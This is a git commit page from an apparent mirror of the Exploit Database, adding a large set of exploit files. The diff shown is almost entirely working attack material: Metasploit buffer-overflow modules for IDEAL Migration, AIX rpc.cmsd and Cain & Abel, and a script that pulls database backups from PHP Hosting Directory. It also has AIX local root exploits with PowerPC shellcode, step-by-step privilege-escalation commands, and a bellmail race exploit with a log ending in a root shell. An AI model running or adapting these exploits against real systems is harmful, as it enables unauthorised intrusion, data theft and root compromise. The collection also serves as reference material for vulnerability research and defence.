bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated

Browse source
This commit is contained in:
Offensive Security 2013-12-03 19:44:07 +00:00
parent 90ffeebb3b
commit fffbf04102
26916 changed files with 2264258 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

0
README.md Normal file → Executable file
View file

26915
files.csv Executable file
View file

File diff suppressed because it is too large Load diff

197
platforms/aix/dos/15264.py Executable file
View file

@ -0,0 +1,197 @@
#!/usr/bin/env python
#-*- coding:cp1254 -*-
'''
# Title : PHP Hosting Directory 2.0 Database Disclosure Exploit (.py)
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Down. Script : -
# Proof : http://img214.imageshack.us/img214/2407/directory.jpg
# Tested : Windows XP Professional sp3
# Home : http://z0rlu.blogspot.com
# Thanks : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org
# Date : 16/10/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : off ulan off / http://www.youtube.com/watch?v=mIdwAz7-cHk
'''
import sys, urllib2, re, os, time
def indiriyoruz(url):
import urllib
aldosyayi = urllib.urlopen(url)
indiraq = open(url.split('/')[-1], 'wb')
indiraq.write(aldosyayi.read())
aldosyayi.close()
indiraq.close()
if len(sys.argv) < 3:
import os
os.system(['clear','cls'][1])
os.system('color 2')
print "_______________________________________________________________"
print " "
print " PHP Hosting Directory 2.0 Database Disclosure Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print ' usage: %s http://server.com/path/ day-mounth-year' % os.path.basename(sys.argv[0])
print " "
print " example day-mounth-year for today: "
print " "
print " today: 16-10-2010 "
print " "
print "_______________________________________________________________"
sys.exit("\nexample: http://www.server.com/ 16-10-2010")
''' link kontrol 1 '''
add = "http://"
add2 = "/"
sitemiz = sys.argv[1]
if sitemiz[-1:] != add2:
print "\nnwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz
if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz
db = "admin/backup/db/backup_db_"
tarih = sys.argv[2]
uzanti = ".sql.gz"
url2 = sitemiz + db + tarih + uzanti
''' link kontrol 2 '''
try:
adreskontrol = urllib2.urlopen(url2).read()
if len(adreskontrol) > 0:
print "\nGood Job Bro!"
except urllib2.HTTPError:
import os
import sys
print "\nForbidden Sorry! Server has a Security!"
sys.exit(1)
''' dosya indiriliyor '''
if __name__ == '__main__':
import sys
if len(sys.argv) == 3:
print "\nFile is Downloading\n"
try:
indiriyoruz(url2)
except IOError:
print '\nFilename not found.'

107
platforms/aix/dos/16657.rb Executable file
View file

@ -0,0 +1,107 @@
##
# $Id: ideal_migration_ipj.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'PointDev IDEAL Migration Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in versions v9.7
through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of
IDEAL Migration. All versions are suspected to be vulnerable.
By creating a specially crafted ipj file, an an attacker may be able
to execute arbitrary code.
NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH
},
'License' => MSF_LICENSE,
'Author' => [ 'Dr_IDE', 'dookie', 'jduck' ],
'Version' => '$Revision: 10477 $',
'References' =>
[
[ 'CVE', '2009-4265' ],
[ 'OSVDB', '60681' ],
[ 'URL', 'http://www.exploit-db.com/exploits/10319' ],
[ 'URL', 'http://www.exploit-db.com/exploits/12403' ],
[ 'URL', 'http://www.exploit-db.com/exploits/12404' ],
[ 'URL', 'http://www.exploit-db.com/exploits/12540' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x1a\x22\x3c\x3e",
'StackAdjustment' => -3500,
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'IDEAL Migration <= 4.5.1 on Windows XP',
{
'Ret' => 0x1001411e # CALL EBP in ULMigration_us.dll
# 'Ret' => 0x7c96bf33 # JMP ESP in ULMigration_us.dll (from Blake)
# 'Ret' => 0x77f31d2f # JMP ESP in ?? (from Dr_IDE)
}
],
[ 'IDEAL Administration <= 10.5 on Windows XP',
{
'Ret' => 0x10010F2E # CALL EBP in ListWmi.dll
# 'Ret' => 0x77f31d2f # JMP ESP in ?? (from Dr_IDE)
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Dec 05 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.ipj']),
], self.class)
end
def exploit
ipj = "\r\n"
ipj << "[Group,Export,Yes]\r\n"
ipj << "Computer="
sploit = ""
sploit << rand_text_alpha_upper(2420)
sploit << [target.ret].pack('V')
# These nops are required to move the payload below where ebp points
# when returning...
sploit << make_nops(768)
sploit << payload.encoded
ipj << sploit
ipj << "\r\n"
ipj << "[End]\r\n"
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(ipj)
end
end

121
platforms/aix/dos/16929.rb Executable file
View file

@ -0,0 +1,121 @@
##
# $Id: rpc_cmsd_opcode21.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::SunRPC
include Msf::Exploit::Brute
def initialize(info = {})
super(update_info(info,
'Name' => 'AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability in opcode 21 handled by
rpc.cmsd on AIX. By making a request with a long string passed to the first
argument of the "rtable_create" RPC, a stack based buffer overflow occurs. This
leads to arbitrary code execution.
NOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where
further attempts are not possible.
},
'Author' =>
[
'Rodrigo Rubira Branco (BSDaemon)',
'jduck',
],
'Version' => '$Revision: 10998 $',
'References' =>
[
[ 'CVE', '2009-3699' ],
[ 'OSVDB', '58726' ],
[ 'BID', '36615' ],
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825' ],
[ 'URL', 'http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc' ]
],
'Platform' => [ 'aix' ],
'Payload' =>
{
'Space' => 4104,
'BadChars' => "\x00",
# The RPC function splits the string by 0x40, watch out!
# It's not a payload badchar since we're putting the payload elsewhere...
'DisableNops' => true
},
'Targets' =>
[
[
'IBM AIX Version 5.1',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'AIX' => '5.1',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x2022dfc8 },
#worked on ibmoz - 'Start' => { 'Ret' => 0x2022e8c8 },
'Stop' => { 'Ret' => 0x202302c8 },
'Step' => 600
}
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 07 2009'))
end
def brute_exploit(brute_target)
if not @aixpayload
datastore['AIX'] = target['AIX']
@aixpayload = regenerate_payload.encoded
end
print_status("Trying to exploit rpc.cmsd with address 0x%x ..." % brute_target['Ret'])
begin
if (not sunrpc_create('udp', 100068, 4))
raise RuntimeError, 'sunrpc_create failed'
end
# spray the heap a bit (work around powerpc cache issues)
buf = make_nops(1024 - @aixpayload.length)
buf << @aixpayload
xdr = XDR.encode(buf, buf)
10.times {
sunrpc_call(7, xdr, 2)
}
#print_status("ATTACH DEBUGGER NOW!"); select(nil,nil,nil,5)
buf = rand_text_alphanumeric(payload_space)
buf << [brute_target['Ret']].pack('N')
xdr = XDR.encode(buf, "")
sunrpc_authunix('localhost', 0, 0, [])
sunrpc_call(21, xdr, 2)
handler(sunrpc_callsock)
sunrpc_destroy
rescue Rex::Proto::SunRPC::RPCTimeout
# print_error('RPCTimeout')
rescue EOFError
# print_error('EOFError')
end
end
end

13
platforms/aix/dos/19041 Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/17/info
By default, /usr/bin/chroot is improperly installed in Ultrix versions 4.0 and 4.1. Anyone can execute /usr/bin/chroot this can lead to system users to gain unauthorized privileges.
$ mkdir /tmp/etc
$ echo root::0:0::/:/bin/sh > /tmp/etc/passwd
$ mkdir /tmp/bin
$ cp /bin/sh /tmp/bin/sh
$ cp /bin/chmod /tmp/bin/chmod
$ chroot /tmp /bin/login
Then login as root with no password. chmod /tmp/bin/sh
to 4700, exit and run the suid /tmp/bin/sh.

16
platforms/aix/dos/19043 Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/22/info
This applies to sites that have installed Sun Source tapes only.
The Sun distribution of sources (sunsrc) has an installation procedure which creates the directory /usr/release/bin and installs two setuid root files in it: makeinstall and winstall. These are both binary files which exec other programs: "make -k install" (makeinstall) or "install" (winstall) without a full path or reseting the PATH enviroment variable.
This makes it possible for users on that system to become root.
$ cp /bin/sh /tmp/sh
$ echo chmod 4777 /tmp/sh > /tmp/install
$ chmod a+rx /tmp/install
$ set PATH=/tmp:$PATH
$ export PATH
$ /usr/bin/winstall
$ /tmp/sh
#

6
platforms/aix/dos/19045 Executable file
View file

@ -0,0 +1,6 @@
source: http://www.securityfocus.com/bid/59/info
/etc/crash was installed setgid kmem and excutable by anyone. Any user can use the ! shell command escape to executes commands, which are then performed with group set to kmem.
$ /etc/crash
! sh

15
platforms/aix/dos/19046 Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/61/info
There exists a buffer overflow in the Apple AppleShare IP Mail Server 5.0.3. If yu connect to the SMTP port
and issue a HELO command with a large string (500 bytes or more) for a hostname the server, and possibly the whole machine, will crash.
$ telnet some.where
Trying 1.2.3.4...
Connected to some.where.
Escape character is '^]'.
220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready
HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX
[ and it just hangs ]
$ ping some.where
[ ...nothing... ]

10
platforms/aix/dos/19049 Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/66/info
A vulnerability exists in inetd which allows a remote user to crash inetd if the tcpmux service is not commented
out of /etc/inetd.conf. The tcpmux service is defined in RFC1078
$ nmap -p 1-64000 -i <target host>
It is also claimed inetd will die if the Windows 95/NT
program postscan.exe, made by 7thsphere, is run againts
the host.

7
platforms/aix/dos/22249.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/6840/info
A buffer overflow vulnerability has been discovered in the libIM library available for the AIX 4.3, 5.1, 5.2 operating system. As a result it may be possible to overwrite sensitive memory in programs linked to the affected library. By identifying a linked application with the setuid bit applied, it may be possible to exploit this vulnerability to execute code with elevated privileges.
Under certain circumstances this issue may pose as a remote security threat.
/usr/lpp/X11/bin/aixterm -im `perl -e 'print "A"x47; print pack("l",0x11223344)'`

5
platforms/aix/dos/25807.txt Executable file
View file

@ -0,0 +1,5 @@
source: http://www.securityfocus.com/bid/13909/info
invscout is prone to a local buffer overflow vulnerability. This issue presents itself because the application fails to carry out boundary checks on user-supplied data from the command line.
/usr/sbin/invscout `perl -e 'print "A" x 1024;'`

289
platforms/aix/local/1001.txt Executable file
View file

@ -0,0 +1,289 @@
-bash-2.05b$
-bash-2.05b$ cat x_aix5_bellmail.pl
#!/usr/bin/perl
# FileName: x_aix5_bellmail.pl
# Exploit "Race condition vulnerability (BUGTRAQ ID: 8805)" of /usr/bin/bellmail
# command on Aix5 to change any file owner to current user.
#
#Usage : x_aix5_bellmail.pl aim_file
# aim_file : then file wich you want to chown to you.
# Note : Maybe you should run more than one to "Race condition".
# The file named "x_bell.sh" can help you to use this exp.
# You should type "w" "Enter" then "q" "Enter" key on keyboard
# as fast as you can when bellmail prompt "?" appear.
#
# Author : watercloud@xfocus.org
# XFOCUS Team
# http://www.xfocus.net (CN)
# http://www.xfocus.org (EN)
#
# Date : 2004-6-6
# Tested : on Aix5.1.
# Addition: IBM had offered a patch named "IY25661" for it.
# Announce: use as your owner risk!
$CMD="/usr/bin/bellmail";
$MBOX="$ENV{HOME}/mbox";
$TMPFILE="/tmp/.xbellm.tmp";
$AIM_FILE = shift @ARGV ;
$FORK_NUM = 1000;
die "AIM FILE \"$AIM_FILE\" not exist.\n" if ! -e $AIM_FILE;
unlink $MBOX;
system "echo abc > $TMPFILE";
system "$CMD $ENV{LOGIN} < $TMPFILE";
unlink $TMPFILE;
$ret=`ls -l $AIM_FILE"`;
print "Before: $ret";
if( fork()==0 )
{
&deamon($FORK_NUM);
exit 0 ;
}
sleep( (rand()*100)%4);
exec $CMD;
$ret=`ls -l $AIM_FILE"`;
print "Now: $ret";
sub deamon {
$num = shift || 1;
for($i=0;$i<$num;$i++) {
&do_real() if fork()==0;
}
}
sub do_real {
if(-e $MBOX) {
unlink $MBOX ;
symlink "$AIM_FILE",$MBOX;
}
exit 0;
}
#EOF
-bash-2.05b$
-bash-2.05b$ cat x_bellmail.sh
#!/bin/sh
#File:x_bellmail.sh
#The assistant of x_aix5_bellmail.pl
#Author : watercloud@xfocus.org
#Date :2004-6-6
#
X_BELL_PL="./x_aix5_bellmail.pl"
AIM=$1
if [ $# ne 1 ] ;then
echo "Need a aim file name as argv."
exit 1;
fi
if [ ! -e "$1" ];then
echo "$1 not exist!"
exit 1
fi
if [ ! -x "$X_BELL_PL" ];then
echo "can not exec $X_BELL_PL"
exit 1
fi
ret=`ls -l $AIM`
echo $ret; echo
fuser=`echo $ret |awk '{print $3}'`
while [ "$fuser" != "$LOGIN" ]
do
$X_BELL_PL $AIM
ret=`ls -l $AIM`
echo $ret;echo
fuser=`echo $ret |awk '{print $3}'`
done
echo $ret; echo
#EOF
-bash-2.05b$ id
uid=201(cloud) gid=1(staff)
-bash-2.05b$
-bash-2.05b$ oslevel
5.1.0.0
-bash-2.05b$ oslevel -r
5100-01
-bash-2.05b$ ls -l /usr/bin/bellmail
-r-sr-sr-x 1 root mail 30208 Aug 09 2003 /usr/bin/bellmail
-bash-2.05b$ ls -l /etc/passwd
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
-bash-2.05b$ cp /etc/passwd /tmp/
-bash-2.05b$ ./x_bellmail.sh /etc/passwd
./x_bellmail.sh[11]: ne: 0403-012 A test command parameter is not valid.
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:49:30 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:49:35 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:49:40 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:49:43 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
w
From cloud Sun Jun 6 08:49:48 2004
abc
? From cloud Sun Jun 6 08:25:20 2004
abc
? w
bellmail: cannot append to /home/cloud/mbox
? w
bellmail: cannot append to /home/cloud/mbox
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:49:56 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:50:01 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd
-rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd
-bash-2.05b$ cat /etc/passwd
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh
nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
snapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
imnadm:*:188:188::/home/imnadm:/usr/bin/ksh
cloud:!:201:1::/home/cloud:/usr/local/bin/bash
-bash-2.05b$ cat /tmp/passwd |sed 's/cloud:!:201:/cloud:!:0:/' >/etc/passwd
-bash-2.05b$ su cloud
cloud's Password:
3004-502 Cannot get "LOGNAME" variable.
-bash-2.05b$ id
uid=201 gid=1(staff)
-bash-2.05b$ ls -l /etc/passwd
-rw-r--r-- 1 201 staff 568 Jun 06 08:56 /etc/passwd
-bash-2.05b$ echo 'test:!:201:1::/home/cloud:/usr/local/bin/bash' >> /etc/passwd
-bash-2.05b$ cat /etc/passwd
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh
nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
snapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
imnadm:*:188:188::/home/imnadm:/usr/bin/ksh
cloud:!:0:1::/home/cloud:/usr/local/bin/bash
test:!:201:1::/home/cloud:/usr/local/bin/bash
-bash-2.05b$ su cloud
cloud's Password:
bash-2.05b# id
uid=0(root) gid=1(staff)
bash-2.05b# ls -l /etc/passwd
-rw-r--r-- 1 test staff 614 Jun 06 08:58 /etc/passwd
bash-2.05b# cp /tmp/passwd /etc/passwd
bash-2.05b# chown root /tmp/passwd
bash-2.05b# ls -l /tmp/passwd
-rw-r--r-- 1 root staff 570 Jun 06 08:48 /tmp/passwd
bash-2.05b# id
uid=0(root) gid=1(staff)
bash-2.05b#
bash-2.05b# rm /tmp/.bel*
bash-2.05b# rm /tmp/passwd
bash-2.05b#
# milw0rm.com [2005-05-19]

99
platforms/aix/local/1044.c Executable file
View file

@ -0,0 +1,99 @@
/*
*
* IBM AIX netpmon elevated privileges exploit
*
* I just wanted to play with PowerPC (Tested on 5.2)
*
* intropy (intropy <at> caughq.org)
*
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#define DEBUG 1
#define BUFFERSIZE 2048
#define EGGSIZE 2048
#define NOP 0x60
#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)
char shellcode_binsh[] =
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"/bin/sh"
"\x05";
unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
int count, env_size = strlen(payload) + environment_size + 4 + 1;
unsigned long address, *ret_addressp;
if (DEBUG) printf("Adding nops to environment buffer...");
for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
*(env_buffer++) = NOP;
}
if (DEBUG) printf("size %d...\n", count);
if (DEBUG) printf("Adding payload to environment buffer...");
for ( count = 0; count < strlen(payload); count++ ) {
*(env_buffer++) = payload[count];
}
if (DEBUG) printf("size %d...\n", count);
env_buffer[env_size - 1] = '\0';
memcpy(env_buffer, "CAU=", 4);
memset(address_buffer, 'A', buffer_size);
address = ADDRESS;
if (DEBUG) printf("Going for address @ 0x%lx\n", address);
if (DEBUG) printf("Adding return address to buffer...");
ret_addressp = (unsigned long *)(address_buffer+3);
for ( count = 0; count < buffer_size; count += 4) {
*(ret_addressp++) = address;
}
if (DEBUG) printf("size %d...\n", count);
address_buffer[buffer_size - 1] = '\0';
return( 0 );
}
int main()
{
char *buffer, *egg;
char *args[3], *envs[2];
buffer = (char *)malloc(BUFFERSIZE);
egg = (char *)malloc(EGGSIZE);
cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);
args[0] = "/usr/bin/netpmon";
args[1] = "-O";
args[2] = buffer;
args[3] = NULL;
envs[0] = egg;
envs[1] = NULL;
execve( "/usr/bin/netpmon", args, envs );
return( 0 );
}
// milw0rm.com [2005-06-14]

100
platforms/aix/local/1045.c Executable file
View file

@ -0,0 +1,100 @@
/*
*
* IBM AIX ipl_varyon elevated privileges exploit
*
* I just wanted to play with PowerPC (Tested on 5.2)
*
* intropy (intropy <at> caughq.org)
*
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#define DEBUG 1
#define BUFFERSIZE 2048
#define EGGSIZE 2048
#define NOP 0x60
#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)
/* lsd */
char shellcode_binsh[] =
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"/bin/sh"
"\x05";
unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
int count, env_size = strlen(payload) + environment_size + 4 + 1;
unsigned long address, *ret_addressp;
if (DEBUG) printf("Adding nops to environment buffer...");
for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
*(env_buffer++) = NOP;
}
if (DEBUG) printf("size %d...\n", count);
if (DEBUG) printf("Adding payload to environment buffer...");
for ( count = 0; count < strlen(payload); count++ ) {
*(env_buffer++) = payload[count];
}
if (DEBUG) printf("size %d...\n", count);
env_buffer[env_size - 1] = '\0';
memcpy(env_buffer, "CAU=", 4);
memset(address_buffer, 'A', buffer_size);
address = ADDRESS;
if (DEBUG) printf("Going for address @ 0x%lx\n", address);
if (DEBUG) printf("Adding return address to buffer...");
ret_addressp = (unsigned long *)(address_buffer+3);
for ( count = 0; count < buffer_size; count += 4) {
*(ret_addressp++) = address;
}
if (DEBUG) printf("size %d...\n", count);
address_buffer[buffer_size - 1] = '\0';
return( 0 );
}
int main()
{
char *buffer, *egg;
char *args[3], *envs[2];
buffer = (char *)malloc(BUFFERSIZE);
egg = (char *)malloc(EGGSIZE);
cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);
args[0] = "/usr/sbin/ipl_varyon";
args[1] = "-d";
args[2] = buffer;
args[3] = NULL;
envs[0] = egg;
envs[1] = NULL;
execve( "/usr/sbin/ipl_varyon", args, envs );
return( 0 );
}
// milw0rm.com [2005-06-14]

99
platforms/aix/local/1046.c Executable file
View file

@ -0,0 +1,99 @@
/*
*
* IBM AIX paginit root exploit
*
* I just wanted to play with PowerPC (Tested on 5.2)
*
* intropy (intropy <at> caughq.org)
*
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#define DEBUG 1
#define BUFFERSIZE 8000
#define EGGSIZE 4003
#define NOP 0x60
#define ADDRESS 0x2ff22fff-EGGSIZE
/* lsd */
char shellcode_binsh[] =
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"/bin/sh"
"\x05";
unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
int count, env_size = strlen(payload) + environment_size + 4 + 1;
unsigned long address, *ret_addressp;
if (DEBUG) printf("Adding nops to environment buffer...");
for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
*(env_buffer++) = NOP;
}
if (DEBUG) printf("size %d...\n", count);
if (DEBUG) printf("Adding payload to environment buffer...");
for ( count = 0; count < strlen(payload); count++ ) {
*(env_buffer++) = payload[count];
}
if (DEBUG) printf("size %d...\n", count);
env_buffer[env_size - 1] = '\0';
memcpy(env_buffer, "CAU=", 4);
memset(address_buffer, 'A', buffer_size);
address = ADDRESS;
if (DEBUG) printf("Going for address @ 0x%lx\n", address);
if (DEBUG) printf("Adding return address to buffer...");
ret_addressp = (unsigned long *)(address_buffer+2);
for ( count = 0; count < buffer_size; count += 4) {
*(ret_addressp++) = address;
}
if (DEBUG) printf("size %d...\n", count);
address_buffer[buffer_size - 1] = '\0';
return( 0 );
}
int main()
{
char *buffer, *egg;
char *args[3], *envs[2];
buffer = (char *)malloc(BUFFERSIZE);
egg = (char *)malloc(EGGSIZE);
cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);
args[0] = "/usr/bin/paginit";
args[1] = buffer;
args[2] = NULL;
envs[0] = egg;
envs[1] = NULL;
execve( "/usr/bin/paginit", args, envs );
return( 0 );
}
// milw0rm.com [2005-06-14]

73
platforms/aix/local/16659.rb Executable file
View file

@ -0,0 +1,73 @@
##
# $Id: cain_abel_4918_rdp.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Cain & Abel <= v4.9.24 RDP Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in the Cain & Abel v4.9.24
and below. An attacker must send the file to victim, and the victim must open
the specially crafted RDP file under Tools -> Remote Desktop Password Decoder.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancek <trancek[at]yashira.org>' ],
'Version' => '$Revision: 11127 $',
'References' =>
[
[ 'CVE', '2008-5405' ],
[ 'OSVDB', '50342' ],
[ 'URL', 'http://www.milw0rm.com/exploits/7329' ],
[ 'BID', '32543' ],
],
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x0a\x0d\x3c\x22\x3e\x3d",
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# Tested ok patrickw 20090503
[ 'Windows XP SP2 English', { 'Ret' => 0x7c82385d } ], #call esp
[ 'Windows XP SP0/1 English', { 'Ret' => 0x71ab7bfb } ], #jmp esp
[ 'Windows XP SP2 Spanish', { 'Ret' => 0x7c951eed } ], #jmp esp
],
'Privileged' => false,
'DisclosureDate' => 'Nov 30 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'exploit_cain.rdp']),
], self.class)
end
def exploit
filerdp = rand_text_alpha_upper(8206)
filerdp << [target.ret].pack('V') + [target.ret].pack('V')
filerdp << payload.encoded
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(filerdp)
end
end

13
